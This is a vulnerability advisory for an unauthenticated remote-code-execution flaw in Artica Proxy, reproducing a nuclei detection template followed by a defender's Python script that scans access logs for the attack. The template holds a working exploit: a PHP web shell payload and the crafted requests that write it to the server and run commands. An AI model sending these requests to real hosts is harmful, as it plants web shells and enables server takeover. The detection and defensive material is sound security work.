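Artica Proxy Remote Code Execution Vulnerability

Vulnerability Information

Vulnerability name: Artica Proxy Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2024-2054

Vulnerability type: Command execution

Severity: Critical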

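Description: Artica Proxy is a widely used proxy server product, deployed mainly in enterprise network environments, that provides network traffic management, content filtering and similar functions. Because it is so widely deployed, vulnerabilities in it can threaten a large number of enterprise networks. This vulnerability is in a specific endpoint of Artica Proxy: by sending a specially crafted HTTP request to that endpoint, an attacker can achieve remote code execution. The technical root cause is that the software fails to properly validate and handle user input, which allows an attacker to inject and execute arbitrary commands. What makes the vulnerability severe is that it can be exploited without any form of authentication and can be exploited at scale by automated tools, potentially leading to full server compromise, data leakage or service disruption. With a CVSS score of 9.8, it is rated critical, and all users running affected versions are advised to apply the fix immediately.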

Vendor: articatech

Product: artica_proxy

Affected version: 4.50

Search query: http.html:"artica" OR body="artica"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/2ac85447c84c5077f49708edb15e5c6501e5edec/http%2Fcves%2F2024%2FCVE-2024-2054.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details

id: CVE-2024-2054

info:
  name: Artica Proxy - RCE
  author: pussycat0x
  severity: critical
  description: |
    This template targets a remote code execution vulnerability in Artica Proxy by exploiting a specific endpoint.
  reference:
    - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2054.md
    - https://github.com/Madan301/CVE-2024-2054/blob/main/CVE-2024-2054.py
    - https://github.com/tanjiti/sec_profile
    - https://github.com/Madan301/CVE-2024-2054
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2054
    cwe-id: CWE-502
    epss-score: 0.79565
    epss-percentile: 0.99025
    cpe: cpe:2.3:a:articatech:artica_proxy:4.50:*:*:*:*:*:*:*
  metadata:
    vendor: articatech
    product: artica_proxy
    shodan-query: http.html:"artica"
    fofa-query: body="artica"
  tags: cve,cve2024,rce,artica,proxy,intrusive

variables:
  websh: '<?php system($_GET["cmd"]);?>'
  payload: '{{base64(websh)}}'


http:
  - raw:
      - |
        GET /wizard/wiz.upload.php HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wizard/wiz.wizard.progress.php?build-js=%7B'TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI':%20%7B'cache_file':%20'/usr/share/artica-postfix/wizard/meow.upload.php',%20'cache_serializer':%20'json',%20'cache_size':%20999999999,%20'cache_data':%20%7B'{{payload}}+':%20%7B'cache_date':%200,%20'ttl':%20999999999%7D%7D%7D%7D HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.32.3

      - |
        GET /wizard/wiz.upload.php?cmd=id HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "wiz.wizard.progress.php"

      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
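
For defenders reviewing an Artica Proxy host, the following added example (not from the original page or the nuclei-templates project) scans web access logs for the two request shapes the template above sends: a `build-js` parameter on `/wizard/wiz.wizard.progress.php`, and a `cmd` parameter on a script under `/wizard/`. The combined log format, the constructed sample lines, and the names `classify` and `triage` are assumptions; `build-js` on its own may be ordinary wizard traffic, so the `cache_file` key is treated as the stronger signal.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Request part of a common/combined-format access log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PROGRESS_PATH = "/wizard/wiz.wizard.progress.php"  # endpoint named in the template
OBJECT_PARAM = "build-js"                          # parameter named in the template

# Constructed sample lines (documentation IP ranges, placeholder values).
SAMPLE_LOG = """\
198.51.100.9 - - [02/Mar/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2024:10:00:05 +0000] "GET /wizard/wiz.wizard.progress.php?build-js=%7B'k':%20%7B'cache_file':%20'/placeholder'%7D%7D HTTP/1.1" 200 87 "-" "python-requests/2.32.3"
203.0.113.7 - - [02/Mar/2024:10:00:06 +0000] "GET /wizard/wiz.upload.php?cmd=id HTTP/1.1" 200 54 "-" "python-requests/2.32.3"
""".splitlines()

def classify(line):
    """Return (ip, status, finding) if the line matches a template request shape, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = unquote(url.path)
    query = parse_qs(url.query, keep_blank_values=True)
    if path == PROGRESS_PATH and OBJECT_PARAM in query:
        value = " ".join(query[OBJECT_PARAM])
        # cache_file is the key the template uses to name the file that gets written.
        finding = "build-js+cache_file" if "cache_file" in value else "build-js"
        return m["ip"], int(m["status"]), finding
    if path.startswith("/wizard/") and path.endswith(".php") and "cmd" in query:
        return m["ip"], int(m["status"]), "cmd-param"
    return None

def triage(lines):
    """Return ({ip: set of findings}, sorted IPs that sent both request shapes)."""
    stages = defaultdict(set)
    for line in lines:
        result = classify(line)
        if result:
            stages[result[0]].add(result[2])
    both = sorted(ip for ip, s in stages.items()
                  if "cmd-param" in s and s & {"build-js", "build-js+cache_file"})
    return dict(stages), both

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

A client that appears in the second return value sent both request shapes and should be investigated first, together with any recently created `.php` files under the wizard directory.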